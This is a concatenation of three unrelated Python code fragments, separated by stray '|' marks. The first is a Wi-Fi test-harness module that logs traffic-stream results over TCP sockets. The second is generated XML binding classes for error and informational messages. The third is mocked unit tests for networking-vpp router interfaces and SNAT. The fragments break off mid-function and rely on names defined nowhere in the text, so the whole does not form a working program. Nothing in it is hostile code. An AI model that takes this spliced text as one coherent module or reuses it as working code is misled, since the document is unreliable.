FOREGROUND_YELLOW = FOREGROUND_RED | FOREGROUND_GREEN
FOREGROUND_CYAN = FOREGROUND_BLUE | FOREGROUND_GREEN
FOREGROUND_MAGENTA = FOREGROUND_RED | FOREGROUND_BLUE
BACKGROUND_BLUE = 0x10 # background color contains blue.
BACKGROUND_GREEN = 0x20 # background color contains green.
BACKGROUND_RED = 0x40 # background color contains red.
BACKGROUND_INTENSITY = 0x80 # background color is intensified.
std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
cSLog = ""
class classifiedLogs:
"""Global Handler for classified Logs"""
def __init__(self, name, fileName, msg=""):
self.name = name
self.fileD = open(fileName, 'a')
self.msg = msg
self.fileD.write("%s\n" % msg)
#time.strftime("%H-%M-%S_%b-%d-%y", time.localtime())
def log(self, msg):
"""Print out time and message into file"""
self.fileD.write("%s | %s \n" %(time.strftime("%b:%d:%Y-%H:%M:%S",
time.localtime()), msg))
def __str__(self):
return "%s:%s" %(self.fileName, self.msg)
def __del__(self):
self.fileD.close()
class streamInfo:
"""Returns string in formatted stream info"""
def __init__(self, streamID, IPAddress, pairID, direction,
trafficClass, frameRate, phase, RTPID):
self.streamID = streamID
self.IPAddress = IPAddress
self.pairID = pairID
self.direction = direction
self.trafficClass = trafficClass
self.frameRate = frameRate
self.phase = phase
self.status = -1
self.RTPID = RTPID
def __str__(self):
return "%-10s Stream ID = %s , IP Address = %s \n\r%-10s pairID = %s direction = %s \n\r%-10s frameRate =%s \n\r%-10s status =%s %s" % (' ', self.streamID, self.IPAddress, ' ', self.pairID, self.direction, ' ', self.frameRate, ' ', self.status, self.phase)
class streamResult:
"""Returns string in formatted stream result"""
def __init__(self, streamID, IPAddress, rxFrames, txFrames, rxBytes,
txBytes, phase):
self.streamID = streamID
self.IPAddress = IPAddress
self.rxFrames = rxFrames
self.txFrames = txFrames
self.rxBytes = rxBytes
self.txBytes = txBytes
self.phase = phase
#print 'self = %s streamID =%s' % (self,streamID)
def __str__(self):
return "%-10s RX %10s Bytes | TX %10s | Stream ID = %s" % (' ', self.rxBytes, self.txBytes, self.streamID)
# socket desc list to be used by select
waitsocks, readsocks, writesocks = [], [], []
#Multicast test
multicast = 0
def set_color(color, handle=std_out_handle):
"""(color) -> BOOL
Example: set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
"""
bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
return bool
def setUCCPath(path):
"""Set absolute path of cmds or script location"""
global uccPath
uccPath = path
return
def scanner(fileobject, linehandler):
"""Scan file objects"""
for line in fileobject.readlines():
if not line: break
linehandler(line)
def sock_tcp_conn(ipaddr, ipport):
"""function for client socket connection set to blocking mode"""
global readsocks, waitsocks, deftimeout
buf = 2048
addr = (ipaddr, ipport)
mysock = socket(AF_INET, SOCK_STREAM)
try:
mysock.connect(addr)
except:
exc_info = sys.exc_info()
logging.error('Connection Error, IP = %s PORT = %s REASON = %s',
ipaddr, ipport, exc_info[1])
wfa_sys_exit("IP-%s:%s REASON = %s" % (ipaddr, ipport, exc_info[1]))
readsocks.append(mysock)
# Add the descriptor to select wait
waitsocks.append(mysock)
return mysock
def process_ipadd(line):
"""function to parse IP address and port number. Create socket connection if not already."""
global conntable
i = 0
addrlist = []
addrlist = line.split(':')
naddr = len(addrlist)
while i < naddr:
ip = addrlist[i].split(',', 1)
ipa = ip[0].split('=')[1] # ip adress
ipp = ip[1].split('=')[1] # ip port
logging.info('Connecting to - IP Addr = %s Port = %s', ipa, ipp)
sockhdlr = sock_tcp_conn(ipa, int(ipp))
conntable["%s:%s" %(ipa, ipp)] = sockhdlr
i = i+1
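# Example of the address-line format parsed above (addresses and ports are placeholders):
#   "ip=192.168.250.10,port=9000:ip=192.168.250.20,port=9000"
# Each colon-separated entry opens one TCP control connection whose socket is stored in
# conntable under the key "ip:port".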
def close_conn():
global conntable
for sock in conntable.values():
sock.close()
def printStreamResults():
"""Determines if WMM or WPA2 before printing results"""
global resultPrinted
ProgName = os.getenv("PROG_NAME")
if resultPrinted == 1:
return
XLogger.setTestResult("COMPLETED")
if ProgName == "P2P":
return
if "WPA2Test" in retValueTable:
logging.debug("WPA2 Results")
printStreamResults_WPA2()
else:
printStreamResults_WMM()
def printStreamResults_WPA2():
"""Prints stream results of WPA2"""
global resultPrinted
maxRTP = 1
set_color(FOREGROUND_WHITE)
if not streamSendResultArray:
resultPrinted = 0
else:
resultPrinted = 1
logging.info("\n\r %-7s --------------------STREAM RESULTS-----------------------" % "")
for s in streamSendResultArray:
sDisplayAddress = s.IPAddress
if s.IPAddress in DisplayNameTable:
sDisplayAddress = DisplayNameTable[s.IPAddress]
for r in streamInfoArray:
if r.streamID == s.streamID and r.IPAddress == s.IPAddress and r.phase == s.phase:
recv_id = r.pairID
trafficClass = r.trafficClass
phase = r.phase
break
for p in streamRecvResultArray:
pDisplayAddress = p.IPAddress
if p.IPAddress in DisplayNameTable:
pDisplayAddress = DisplayNameTable[p.IPAddress]
if p.streamID == recv_id and p.phase == s.phase:
logging.info("\n\r %-7s ----- %s --> %s -----" %
("", sDisplayAddress, pDisplayAddress))
logging.info("\n%s" % s)
if maxRTP < int(r.RTPID):
maxRTP = int(r.RTPID)
logging.info("\n%s" % p)
break
set_color(FOREGROUND_WHITE)
def printStreamResults_WMM():
"""Prints stream results of WMM"""
global resultPrinted
summaryList = {}
summaryStreamDisplay = {}
maxRTP = 1
i = 1
if not streamSendResultArray:
resultPrinted = 0
else:
resultPrinted = 1
logging.info("\n\r %-7s --------------------STREAM RESULTS-----------------------" % "")
for s in streamSendResultArray:
sDisplayAddress = s.IPAddress
if s.IPAddress in DisplayNameTable:
sDisplayAddress = DisplayNameTable[s.IPAddress]
for r in streamInfoArray:
if r.streamID == s.streamID and r.IPAddress == s.IPAddress and r.phase == s.phase:
recv_id = r.pairID
trafficClass = r.trafficClass
phase = r.phase
break
for p in streamRecvResultArray:
pDisplayAddress = p.IPAddress
if p.IPAddress in DisplayNameTable:
pDisplayAddress = DisplayNameTable[p.IPAddress]
if p.streamID == recv_id and p.phase == s.phase:
logging.info("\n\r %-7s ----- RTP_%s-%s ( %s --> %s ) PHASE = %s -----" %("", r.RTPID, trafficClass, sDisplayAddress, pDisplayAddress, phase))
logging.info("\n%s" % s)
summaryList.setdefault("%s:%s"%(int(r.RTPID), int(phase)), p.rxBytes)
summaryStreamDisplay.setdefault("%s:%s" % (int(r.RTPID), int(phase)), "RTP%-1s_%-10s [%s-->%s]" % (r.RTPID, trafficClass, sDisplayAddress, pDisplayAddress))
if maxRTP < int(r.RTPID):
maxRTP = int(r.RTPID)
logging.info("\n%s" % p)
break
set_color(FOREGROUND_WHITE)
logging.info("--------------------------SUMMARY----------------------------------")
logging.info(" %46s %10s | %10s" % ("|", "Phase1 (Bytes)", "Phase2 (Bytes)"))
logging.info("-------------------------------------------------------------------")
while i <= maxRTP:
str1 = ""
str2 = ""
stremDisplay = ""
if "%s:%s"%(i, "1") in summaryList:
str1 = summaryList["%s:%s" % (i, "1")]
stremDisplay = summaryStreamDisplay["%s:%s"%(i, "1")]
if "%s:%s"%(i, "2") in summaryList:
str2 = summaryList["%s:%s" % (i, "2")]
stremDisplay = summaryStreamDisplay["%s:%s"%(i, "2")]
logging.info("\n%6s %-43s %5s %10s | %10s" % (" ", stremDisplay, "|", str1, str2))
i = i + 1
set_color(FOREGROUND_INTENSITY)
def responseWaitThreadFunc(_threadID, command, addr, receiverStream):
global waitsocks, readsocks, writesocks, runningPhase, testRunning, streamInfoArray
logging.debug("responseWaitThreadFunc started %s" % testRunning)
while testRunning > 0:
readables, writeables, exceptions = select(readsocks, writesocks, [], 0.1)
for sockobj in readables:
if sockobj in waitsocks:
resp = sockobj.recv(2048)
resp_arr = resp.split(',')
for socks in conntable:
if sockobj == conntable[socks]:
responseIPAddress = socks
displayaddr = responseIPAddress
if responseIPAddress in DisplayNameTable:
displayaddr = DisplayNameTable[responseIPAddress]
logging.info("%-15s <--1 %s" % (displayaddr, resp))
# Check for send stream completion
if len(resp_arr) > 2:
if resp_arr[3] == '':
logging.error("NULL streamID returned from %s" % responseIPAddress)
continue
if resp_arr[2] == 'streamID':
logging.debug("STREAM COMPLETED = %s" % (resp_arr[3]))
# spliting the values of multiple streams
idx = resp_arr[3].strip()
idx = idx.split(' ')
sCounter = 0 # For multiple stream value returns
if resp_arr[7].split(' ')[sCounter] == '':
sCounter = 1
for i in idx:
txFrames = resp_arr[5].split(' ')[sCounter]
logging.debug(" TXFRAMES = %s" % txFrames)
i = ("%s;%s"%(i, responseIPAddress))
if txFrames != '0':
logging.info("%s (%-15s) <-- SEND Stream - %s Completed " % (displayaddr, responseIPAddress, i))
# Setting status complete
for p in streamInfoArray:
if p.IPAddress == responseIPAddress and p.streamID == i and p.phase == runningPhase:
p.status = 1
streamSendResultArray.append(streamResult(i, responseIPAddress, resp_arr[7].split(' ')[sCounter], resp_arr[5].split(' ')[sCounter], resp_arr[11].split(' ')[sCounter], resp_arr[9].split(' ')[sCounter], runningPhase))
else:
streamRecvResultArray.append(streamResult(i, responseIPAddress, resp_arr[7].split(' ')[sCounter], resp_arr[5].split(' ')[sCounter], resp_arr[11].split(' ')[sCounter], resp_arr[9].split(' ')[sCounter], runningPhase))
logging.info("%s (%-15s) <---- RECV Stream - %s Completed " % (displayaddr, responseIPAddress, i))
sCounter += 1
else:
logging.debug('Unwanted data on socket')
logging.debug("\n | |
gds_collector_=gds_collector_)
self.Errors = obj_
obj_.original_tagname_ = 'Errors'
elif nodeName_ == 'InformationalMessages':
obj_ = ArrayOfInformationalMessage.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.InformationalMessages = obj_
obj_.original_tagname_ = 'InformationalMessages'
# end class ResponseInformation
class ArrayOfError(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, Error=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
if Error is None:
self.Error = []
else:
self.Error = Error
self.Error_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ArrayOfError)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ArrayOfError.subclass:
return ArrayOfError.subclass(*args_, **kwargs_)
else:
return ArrayOfError(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Error(self):
return self.Error
def set_Error(self, Error):
self.Error = Error
def add_Error(self, value):
self.Error.append(value)
def insert_Error_at(self, index, value):
self.Error.insert(index, value)
def replace_Error_at(self, index, value):
self.Error[index] = value
def hasContent_(self):
if (
self.Error
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfError', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ArrayOfError')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ArrayOfError':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ArrayOfError')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ArrayOfError', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ArrayOfError'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfError', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Error_ in self.Error:
namespaceprefix_ = self.Error_nsprefix_ + ':' if (UseCapturedNS_ and self.Error_nsprefix_) else ''
Error_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Error', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Error':
obj_ = Error.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Error.append(obj_)
obj_.original_tagname_ = 'Error'
# end class ArrayOfError
class Error(GeneratedsSuper):
"""Error"""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, Code=None, Description=None, AdditionalInformation=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.Code = Code
self.Code_nsprefix_ = None
self.Description = Description
self.Description_nsprefix_ = None
self.AdditionalInformation = AdditionalInformation
self.AdditionalInformation_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, Error)
if subclass is not None:
return subclass(*args_, **kwargs_)
if Error.subclass:
return Error.subclass(*args_, **kwargs_)
else:
return Error(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Code(self):
return self.Code
def set_Code(self, Code):
self.Code = Code
def get_Description(self):
return self.Description
def set_Description(self, Description):
self.Description = Description
def get_AdditionalInformation(self):
return self.AdditionalInformation
def set_AdditionalInformation(self, AdditionalInformation):
self.AdditionalInformation = AdditionalInformation
def hasContent_(self):
if (
self.Code is not None or
self.Description is not None or
self.AdditionalInformation is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='Error', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('Error')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'Error':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='Error')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='Error', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='Error'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='Error', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Code is not None:
namespaceprefix_ = self.Code_nsprefix_ + ':' if (UseCapturedNS_ and self.Code_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sCode>%s</%sCode>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Code), input_name='Code')), namespaceprefix_ , eol_))
if self.Description is not None:
namespaceprefix_ = self.Description_nsprefix_ + ':' if (UseCapturedNS_ and self.Description_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sDescription>%s</%sDescription>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Description), input_name='Description')), namespaceprefix_ , eol_))
if self.AdditionalInformation is not None:
namespaceprefix_ = self.AdditionalInformation_nsprefix_ + ':' if (UseCapturedNS_ and self.AdditionalInformation_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sAdditionalInformation>%s</%sAdditionalInformation>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.AdditionalInformation), input_name='AdditionalInformation')), namespaceprefix_ , eol_))
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Code':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'Code')
value_ = self.gds_validate_string(value_, node, 'Code')
self.Code = value_
self.Code_nsprefix_ = child_.prefix
elif nodeName_ == 'Description':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'Description')
value_ = self.gds_validate_string(value_, node, 'Description')
self.Description = value_
self.Description_nsprefix_ = child_.prefix
elif nodeName_ == 'AdditionalInformation':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'AdditionalInformation')
value_ = self.gds_validate_string(value_, node, 'AdditionalInformation')
self.AdditionalInformation = value_
self.AdditionalInformation_nsprefix_ = child_.prefix
# end class Error
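# Minimal usage sketch (not part of the generated bindings): constructing an Error by
# hand and serializing it with the export() method defined above. It assumes the usual
# generateDS runtime helpers referenced in this module (showIndent, quote_xml, ...) are
# defined earlier in the file; the helper name and field values are illustrative only.
def _example_export_error():
    import io
    err = Error(Code='E001', Description='Example description',
                AdditionalInformation='Example detail')
    buf = io.StringIO()
    err.export(buf, level=0, name_='Error')
    return buf.getvalue()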
class ArrayOfInformationalMessage(GeneratedsSuper):
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, InformationalMessage=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
if InformationalMessage is None:
self.InformationalMessage = []
else:
self.InformationalMessage = InformationalMessage
self.InformationalMessage_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ArrayOfInformationalMessage)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ArrayOfInformationalMessage.subclass:
return ArrayOfInformationalMessage.subclass(*args_, **kwargs_)
else:
return ArrayOfInformationalMessage(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_InformationalMessage(self):
return self.InformationalMessage
def set_InformationalMessage(self, InformationalMessage):
self.InformationalMessage = InformationalMessage
def add_InformationalMessage(self, value):
self.InformationalMessage.append(value)
def insert_InformationalMessage_at(self, index, value):
self.InformationalMessage.insert(index, value)
def replace_InformationalMessage_at(self, index, value):
self.InformationalMessage[index] = value
def hasContent_(self):
if (
self.InformationalMessage
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfInformationalMessage', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ArrayOfInformationalMessage')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'ArrayOfInformationalMessage':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ArrayOfInformationalMessage')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ArrayOfInformationalMessage', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ArrayOfInformationalMessage'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='ArrayOfInformationalMessage', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for InformationalMessage_ in self.InformationalMessage:
namespaceprefix_ = self.InformationalMessage_nsprefix_ + ':' if (UseCapturedNS_ and self.InformationalMessage_nsprefix_) else ''
InformationalMessage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='InformationalMessage', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'InformationalMessage':
obj_ = InformationalMessage.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.InformationalMessage.append(obj_)
obj_.original_tagname_ = 'InformationalMessage'
# end class ArrayOfInformationalMessage
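# Sketch of hydrating the generated classes from raw XML. This assumes the standard
# generateDS module-level helpers (e.g. Tag_pattern_) are defined earlier in this file,
# as the build() methods above imply, and that lxml is the underlying parser; the helper
# name is hypothetical.
def _example_parse_informational_messages(xml_text):
    from lxml import etree
    node = etree.fromstring(xml_text)
    return ArrayOfInformationalMessage.factory().build(node)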
class InformationalMessage(GeneratedsSuper):
"""InformationalMessage"""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, Code=None, Message=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.Code = Code
self.Code_nsprefix_ = None
self.Message = Message
self.Message_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, InformationalMessage)
if subclass is not None:
return subclass(*args_, **kwargs_)
if InformationalMessage.subclass:
return InformationalMessage.subclass(*args_, **kwargs_)
else:
return InformationalMessage(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Code(self):
return self.Code
def set_Code(self, Code):
self.Code = Code
def get_Message(self):
return self.Message
def set_Message(self, Message):
self.Message = Message
def | |
# Test adding a router interface to create it in VPP.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=None):
loopback_idx = self.vpp.ensure_router_interface_on_host(
port, router)
self.vpp.vpp.get_ifidx_mac_address(loopback_idx)
self.vpp.vpp.set_loopback_bridge_bvi.assert_called_once_with(
loopback_idx, 'fake_dom_id')
self.vpp.vpp.set_interface_vrf.assert_called_once_with(
loopback_idx, router['vrf_id'], router['is_ipv6'])
self.vpp.vpp.set_interface_ip.assert_called_once_with(
loopback_idx,
iface(router['gateway_ip'], router['prefixlen']))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def _test_create_router_interface_with_existing_bvi_and_ip(
self, m_network_on_host, port, router):
# Test repeat adding the same router interface.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[
iface(router['gateway_ip'], router['prefixlen'])
]):
with mock.patch.object(self.vpp.vpp, 'get_interface_vrf',
return_value=[]):
self.vpp.ensure_router_interface_on_host(port, router)
self.vpp.vpp.create_loopback.assert_not_called()
self.vpp.vpp.set_loopback_bridge_bvi.assert_not_called()
self.vpp.vpp.set_interface_vrf.assert_called_once_with(
5, router['vrf_id'], router['is_ipv6'])
self.vpp.vpp.set_interface_ip.assert_not_called()
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def _test_create_router_interface_with_existing_bvi_different_ip(
self, m_network_on_host, port, router, other_router):
# Test adding a different router interface.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses', return_value=[]):
with mock.patch.object(self.vpp.vpp, 'get_interface_vrf',
return_value=5):
self.vpp.ensure_router_interface_on_host(port, router)
self.vpp.vpp.create_loopback.assert_not_called()
self.vpp.vpp.set_loopback_bridge_bvi.assert_not_called()
self.vpp.vpp.set_interface_vrf.assert_not_called()
self.vpp.vpp.set_interface_ip.assert_called_once_with(
5,
iface(router['gateway_ip'], router['prefixlen']))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
@mock.patch(
'networking_vpp.agent.server.VPPForwarder.' +
'export_routes_from_tenant_vrfs')
def _test_delete_router_interface_on_host(self, m_export_routes,
m_network_on_host, port,
is_ipv6):
# Test deleting a router interface to delete the router in VPP.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
if not is_ipv6:
router_port = self._get_mock_router_interface()
else:
router_port = self._get_mock_v6_router_interface()
self.vpp.router_interfaces[port] = router_port
gateway_ip = router_port['gateway_ip']
prefixlen = router_port['prefixlen']
self.vpp.vpp.get_snat_interfaces.return_value = [5]
self.vpp.vpp.get_bridge_bvi.return_value = 5
self.vpp.vpp.get_interface_ip_addresses.return_value = [
iface(gateway_ip, prefixlen)
]
self.vpp.delete_router_interface_on_host(port)
self.vpp.vpp.set_snat_on_interface.assert_called_once_with(
5, is_add=False, is_inside=True)
m_export_routes.assert_called_once_with(source_vrf=5, is_add=False)
self.vpp.vpp.get_bridge_bvi.assert_called_once_with(5)
self.vpp.vpp.delete_loopback.assert_called_once_with(5)
self.assertIsNone(self.vpp.router_interfaces.get(port))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def _test_delete_router_interface_with_multiple_interfaces(
self, m_network_on_host, port, is_ipv6):
# Test deleting a router interface with interfaces from other subnets
# also present on the router.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
if not is_ipv6:
router_port = self._get_mock_router_interface()
else:
router_port = self._get_mock_v6_router_interface()
self.vpp.router_interfaces[port] = router_port
gateway_ip = router_port['gateway_ip']
prefixlen = router_port['prefixlen']
second_gateway_ip = '172.16.58.3' if not is_ipv6 else 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b'
second_gateway_prefixlen = 24
self.vpp.vpp.get_snat_interfaces.return_value = [5]
self.vpp.vpp.get_bridge_bvi.return_value = 5
self.vpp.vpp.get_interface_ip_addresses.return_value = [
iface(gateway_ip, prefixlen),
iface(second_gateway_ip, second_gateway_prefixlen)]
self.vpp.delete_router_interface_on_host(port)
self.vpp.vpp.delete_loopback.assert_not_called()
self.vpp.vpp.del_interface_ip.assert_called_once_with(
5, iface(gateway_ip, prefixlen))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def test_create_router_external_gateway_on_host(self, m_network_on_host):
router = self._get_mock_external_router()
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[]):
self.vpp.ensure_router_interface_on_host(
uuidgen.uuid1(), router)
self.vpp.vpp.snat_overload_on_interface_address.\
assert_called_once_with(5)
self.vpp.vpp.set_snat_on_interface.assert_called_once_with(
5, 0)
self.vpp.vpp.set_interface_ip.assert_called_once_with(
5,
iface(router['gateways'][0][0], router['gateways'][0][1]))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def test_create_router_external_gateway_with_snat_interface_set(
self, m_network_on_host):
router = self._get_mock_external_router()
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[5]):
self.vpp.ensure_router_interface_on_host(
uuidgen.uuid1(), router)
self.vpp.vpp.set_snat_on_interface.assert_not_called()
self.vpp.vpp.set_interface_ip.assert_called_once_with(
5,
iface(router['gateways'][0][0], router['gateways'][0][1]))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
